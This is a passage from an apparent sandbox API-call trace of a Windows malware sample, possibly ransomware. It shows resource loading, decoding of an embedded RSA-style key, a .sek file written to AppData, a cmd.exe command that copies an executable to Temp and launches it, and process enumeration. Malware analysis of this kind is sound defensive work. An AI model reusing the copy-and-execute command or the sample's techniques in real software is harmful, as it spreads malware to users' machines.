nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x12fb78, lpOverlapped=0x0 | out: lpBuffer=0x12bf798*, lpNumberOfBytesWritten=0x12fb78*=0x112, 
lpOverlapped=0x0) returned 1 [0106.534] CloseHandle (hObject=0xec) returned 1 [0106.534] GetCurrentThreadId () returned 0xaf0 [0106.534] GetCurrentThreadId () returned 0xaf0 [0106.534] GetCurrentThreadId () returned 0xaf0 [0106.534] FindResourceW (hModule=0x400000, lpName="KLIST", lpType=0xa) returned 0x51c3f8 [0106.534] LoadResource (hModule=0x400000, hResInfo=0x51c3f8) returned 0x516690 [0106.534] SizeofResource (hModule=0x400000, hResInfo=0x51c3f8) returned 0x192 [0106.534] LockResource (hResData=0x516690) returned 0x516690 [0106.534] FreeResource (hResData=0x516690) returned 0 [0106.534] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0106.534] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0106.534] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0106.534] LockResource (hResData=0x50d64c) returned 0x50d64c [0106.534] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361de0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0106.534] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361de0, cbMultiByte=38, lpWideCharStr=0x133deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0106.535] FreeResource (hResData=0x50d64c) returned 0 [0106.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361de4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0106.535] GetCurrentThreadId () returned 0xaf0 [0106.535] 
GetCurrentThreadId () returned 0xaf0 [0106.535] GetCurrentThreadId () returned 0xaf0 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12e35c8, cbMultiByte=402, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 402 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12e35c8, cbMultiByte=402, lpWideCharStr=0x12fee1c, cchWideChar=402 | out: lpWideCharStr="1536\r\n33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F\r\n00010001\r\n") returned 402 [0106.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F", cchWideChar=384, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 384 [0106.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F", cchWideChar=384, lpMultiByteStr=0x12e35cc, 
cbMultiByte=384, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F", lpUsedDefaultChar=0x0) returned 384 [0106.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="00010001", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0106.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="00010001", cchWideChar=8, lpMultiByteStr=0x1312d8c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="00010001", lpUsedDefaultChar=0x0) returned 8 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12e35cc, cbMultiByte=384, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1Fws\\system32\\逐甬逐甬眩e") returned 384 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12e890, cchWideChar=2047 | out: 
lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793") returned 256 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12e35cc, cbMultiByte=384, lpWideCharStr=0x12e890, cchWideChar=2047 | out: lpWideCharStr="33324697D85614AAB6D98F2EE05B1BB40171424AE4C05FC1F36E602D864951456DF09B21586C47CC3F26F9E390C771449CE5F6D449FAEB04DAE0847529C0D092AC3168E5D9ED2FCEB06A25E7FA298DBF7B38E093E784F96CA556CC12A8396F4D7165CA18B9049D247C131C990F128D58446A1D6D31BA1C47F442249E6E79CAA3089A7EA8041E9CAEA18B222453372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 384 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69BC543DAC9B57365F9C3440155E86E8B5040D058A81A1FBC595113A4BD0C4E706265772A8DBBC77DCCBE5C1C289C1E214BD4C2A1969A36593C153474D82BAA2793372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 256 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf79c, cbMultiByte=256, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="2C3BCBC20E80B22D0258C3C2DF5BD18B2CB893C60EB2B9F638A4138D2DB35CC32BB29B09781DA2EE8A8A69753DBBFE38918004DEBD25DADEAE0775D7FFCBBDF6D1B2061A0E436BB46E37E4551BDDF25C84F66AF2B519221763DA746415845B4D0BF027741BD34AABA6C557AFACF99E5968D51482E140621682BFCDB95E712FF9372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 256 [0106.535] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1312d8c, cbMultiByte=8, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="000100010E80B22D0258C3C2DF5BD18B2CB893C60EB2B9F638A4138D2DB35CC32BB29B09781DA2EE8A8A69753DBBFE38918004DEBD25DADEAE0775D7FFCBBDF6D1B2061A0E436BB46E37E4551BDDF25C84F66AF2B519221763DA746415845B4D0BF027741BD34AABA6C557AFACF99E5968D51482E140621682BFCDB95E712FF9372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 8 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x128b71c, cbMultiByte=128, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="F9B836BF6D9E9C77A51931DB6FE75A14FA6DF5B0A5D06D8C7898DB3A4ACCB49978A4DDD8544FB647ECB00C0ACD8A8D38AECB8C6A930467792DFD8559F61CE10DD1B2061A0E436BB46E37E4551BDDF25C84F66AF2B519221763DA746415845B4D0BF027741BD34AABA6C557AFACF99E5968D51482E140621682BFCDB95E712FF9372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 128 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x128b71c, cbMultiByte=128, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="32C7E17D9BD34A8F9AB2FB451ED197196DDF31074C4B4080A50BF6432A981D0E3478F16FCA212B62ACE127053BBB913A1AFF1CCD0FE1A37B9B3C333DFE36C31FD1B2061A0E436BB46E37E4551BDDF25C84F66AF2B519221763DA746415845B4D0BF027741BD34AABA6C557AFACF99E5968D51482E140621682BFCDB95E712FF9372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 128 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12bf9dc, cbMultiByte=256, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: 
lpWideCharStr="3188F4D96148D06248FF860F1F65D120FAB8156037429C7089812BC55632EB609550230C3006C46F6E0A78E1153BEEC8F710D6A710B0D42882A9935004B4A69A98C3C28CAC017EF28377D43559B59A21D88331F028040E4C336ED33F96E99EBAB8595B459D569C2224CAE91892D802D90AF7F85EF7504E474BFABC4037568368372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 256 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x128b71c, cbMultiByte=128, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="3556616B35D0C0FED526B27D7A4361FC451923771D938D3289B7AC6BA0FA6440BB820B585F79BF2751A8B089C62927CCC998F45EF713E3BE0052BC1EE0F07E2998C3C28CAC017EF28377D43559B59A21D88331F028040E4C336ED33F96E99EBAB8595B459D569C2224CAE91892D802D90AF7F85EF7504E474BFABC4037568368372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 128 [0106.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x128b71c, cbMultiByte=128, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: lpWideCharStr="2606AFC093D3A15DF0065F4ADF4D2BCD0B0DBB752F989A70BB273DFE06036A9E9C8484A7A5C138EFE76DA2FEB4403CFC3A0317DA272E5C71CF49414606FB931998C3C28CAC017EF28377D43559B59A21D88331F028040E4C336ED33F96E99EBAB8595B459D569C2224CAE91892D802D90AF7F85EF7504E474BFABC4037568368372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 128 [0106.535] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1312d0c, cbMultiByte=8, lpWideCharStr=0x12e8c4, cchWideChar=2047 | out: 
lpWideCharStr="0000000093D3A15DF0065F4ADF4D2BCD0B0DBB752F989A70BB273DFE06036A9E9C8484A7A5C138EFE76DA2FEB4403CFC3A0317DA272E5C71CF49414606FB931998C3C28CAC017EF28377D43559B59A21D88331F028040E4C336ED33F96E99EBAB8595B459D569C2224CAE91892D802D90AF7F85EF7504E474BFABC4037568368372900408AA32A66C8C5BAA4D20EAB485059EC519FAF4BD37149C39CD8DD553781D95A0EDF5FC7F4B350D4EA2BC0B96A54BE1F깋\x12넘@Ӥ") returned 8 [0106.611] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\3188F4D96148D062.sek" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\3188f4d96148d062.sek"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0106.667] WriteFile (in: hFile=0xec, lpBuffer=0x12fedf0*, nNumberOfBytesToWrite=0x3dc, lpNumberOfBytesWritten=0x12f7f0, lpOverlapped=0x0 | out: lpBuffer=0x12fedf0*, lpNumberOfBytesWritten=0x12f7f0*=0x3dc, lpOverlapped=0x0) returned 1 [0106.668] CloseHandle (hObject=0xec) returned 1 [0106.669] GetTickCount () returned 0x2584c [0106.669] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16345819264) returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0106.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0106.669] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0106.669] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0106.670] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0106.670] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0106.670] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0106.670] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0106.670] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\WTSK8WXH.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\WTSK8WXH.EXE\" [PARAMS]") returned 0xb1 [0106.670] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0106.670] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xec, dwProcessId=0xc70, dwThreadId=0xc74)) returned 1 [0106.677] CloseHandle (hObject=0xf0) returned 1 [0106.677] CloseHandle (hObject=0xec) returned 1 [0106.677] Sleep (dwMilliseconds=0xfa) [0106.931] CreateToolhelp32Snapshot 
(dwFlags=0xf, th32ProcessID=0x0) returned 0xf8 [0106.936] Process32FirstW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.937] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.938] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.939] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.939] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.940] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.941] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, 
szExeFile="winlogon.exe")) returned 1 [0106.941] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.942] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.943] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.943] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.944] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.945] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.946] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0106.946] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.947] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.948] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.950] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.951] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.953] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.954] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
